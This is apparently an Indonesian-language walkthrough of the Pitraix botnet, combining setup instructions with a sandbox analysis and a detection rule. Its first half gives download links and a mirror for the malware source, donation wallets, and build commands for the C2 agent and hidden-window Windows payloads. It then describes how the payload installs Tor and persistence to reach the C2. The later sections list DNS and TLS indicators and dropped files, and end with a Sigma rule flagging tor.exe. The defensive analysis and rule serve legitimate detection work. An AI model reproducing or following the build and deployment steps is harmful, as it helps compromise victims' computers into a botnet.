Instalasi
Github:
https://github.com/ThrillQuks/Pitraix [Banned by Github]
https://github.com/sinister66666/Pitraix [Banned by Github]
https://github.com/thezedwards/Pitraix [Still Alive]
Mirror:
https://anonfiles.com/V8jfY473y0/Pitraix-main_2_zip
If you find this project useful you can donate to the respective developer.
Monero: 85HjZpxZngajAEy2123NuXgu1PnNyq2DLSkkr93cyT8QQVae1GruhL4hHAtnaFqeCF7Vo9eW2P11Sig8DDqzVzCSE95NaW6
Bitcoin (segwit): bc1q2dqk9u06vv2j5p6yptj9ex7epfv77sxjygnrnw
git clone https://github.com/thezedwards/Pitraix
cd Pitraix/pitraix
go mod init pitraix
Build Agent
go build OPER.go
Setelah itu akan terbentuk file OPER yang merupakan Agent dari Pitraix Botnet, Pada awal eksekusi file akan menginstall tor dan membuat tor address yang digunakan sebagai jalur komunikasi.
./OPER
Build Payload
Windows:
64Bit:
GOOS=windows go build -ldflags="-s -w -H=windowsgui" lyst_windows.go
32Bit:
GOOS=windows GOARCH=386 go build -ldflags="-s -w -H=windowsgui" -o lyst_windows32.exe lyst_windows.go
setelah itu akan terbentuk file lyst_windows.exe yang akan menjadi payload dalam koneksi antara Agent dan Target
Linux:
Penggunaan
Payload di eksekusi pada perangkat target, nantinya payload akan menginstall tor network dan menjalankan persistence sehingga komputer target terkoneksi melalui jaringan tor ke Agent yang berfungsi sebagai C2 Botnet. Berikut ini tampilan dari Help command Pitraix
Review
Payload terdeteksi sebagai malware oleh Windows Defender.
Melalui virustotal terdeteksi 17/70 Vendor Antivirus.
Ketika File di Eksekusi
Task Manager
Deteksi C2 Pitraix
Spawn Shell
Shell Execution
Target PC
Table of Contents
Network Communication
DNS Resolutions
When executing the file being studied, it performed the following domain name resolutions.apps.identrust.com
- 23.55.168.144
- 23.55.168.155
dist.torproject.org
- 116.202.120.166
- 38.229.82.35
- 116.202.120.165
- 38.229.82.25
ipinfo.io
- 34.117.59.81
TLS
www.355mg7d4j3do64vidvrmvpy2j.com
Data:
Version: TLS 1.2
Serial Number: 4b57f55ecc1d0a39
Thumbprint: 6a7f37bd7f87f0e54c6d8db9bf760a662368056e
JA3: 140e0f0cad708278ade0984528fe8493
JA3S: 0debd3853f330c574b05e0b6d882dc27
SNI: www.355mg7d4j3do64vidvrmvpy2j.com
Signature Algorithm:
Issuer: CN=www.nzla5b4t6ctmoz7s.com
Subject: CN=www.nzla5b4t6ctmoz7s.com
Files Dropped
C:\Users\user\AppData\Roaming\tor\cached-certs (copy)
C:\Users\user\AppData\Roaming\tor\cached-certs.tmp
C:\Users\user\AppData\Roaming\tor\cached-microdesc-consensus (copy)
C:\Users\user\AppData\Roaming\tor\cached-microdesc-consensus.tmp
C:\Users\user\AppData\Roaming\tor\cached-microdescs.new
C:\Users\user\AppData\Roaming\tor\state (copy)C:\Users\user\AppData\Roaming\tor\state.tmp
C:\Users\user\AppData\Roaming\tor\unverified-microdesc-consensus (copy)
C:\Users\user\AppData\Roaming\tor\unverified-microdesc-consensus.tmp
C:\Windows\Logs\ohsDDO3Nfd1EH3UQD8sVQ1CuM
C:\Windows\security\Olwu9ixeIuV2QdazMcb.zip
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Data\Tor\geoip
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Data\Tor\geoip6
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Olwu9ixeIuV2QdazMcbhid\hostname (copy)
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Olwu9ixeIuV2QdazMcbhid\hostname.tmp
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Olwu9ixeIuV2QdazMcbtorrc
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libcrypto-1_1-x64.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libevent-2-1-7.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libevent_core-2-1-7.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libevent_extra-2-1-7.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libgcc_s_seh-1.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libssl-1_1-x64.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libssp-0.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libwinpthread-1.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\tor-gencert.exe
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\tor.exe
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\zlib1.dll\Device\Null
PREVENTIF
Untuk default konfigurasi dari Botnet Pitraix dapat dicegah dengan menerapkan RULES untuk memblok eksekusi dengan filename tor.exe.
title: Tor Client or Tor Browser Use
id: 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c
status: experimental
description: Detects the use of Tor or Tor-Browser to connect to onion routing networks
references:
- https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/
author: frack113
date: 2022/02/20
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\tor.exe'
- '\Tor Browser\Browser\firefox.exe'
condition: selection
falsepositives:
- Unknown
level: high
tags:
- attack.command_and_control
- attack.t1090.003